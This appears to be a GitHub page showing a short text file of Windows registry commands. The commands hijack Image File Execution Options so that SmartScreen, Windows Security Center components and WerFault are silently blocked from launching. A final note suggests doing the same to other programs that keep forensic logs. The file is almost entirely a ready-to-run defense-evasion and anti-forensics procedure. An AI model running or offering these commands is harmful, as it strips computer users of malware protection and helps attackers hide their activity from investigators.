-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathblock.txt
16 lines (11 loc) · 862 Bytes
/
block.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#
# Abdulkadir GÜNGÖR ([email protected])
# 29/05/2022
#
block smartscreen and security center
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securityhealthhost.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secHealthUI.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\werFault.exe" /v Debugger /d "cmd.exe /C >null: 2>null:"
"cmd.exe /C >null: 2>null:"
Note: If desired, the same process can be done in other executable files that keep log records for forensic.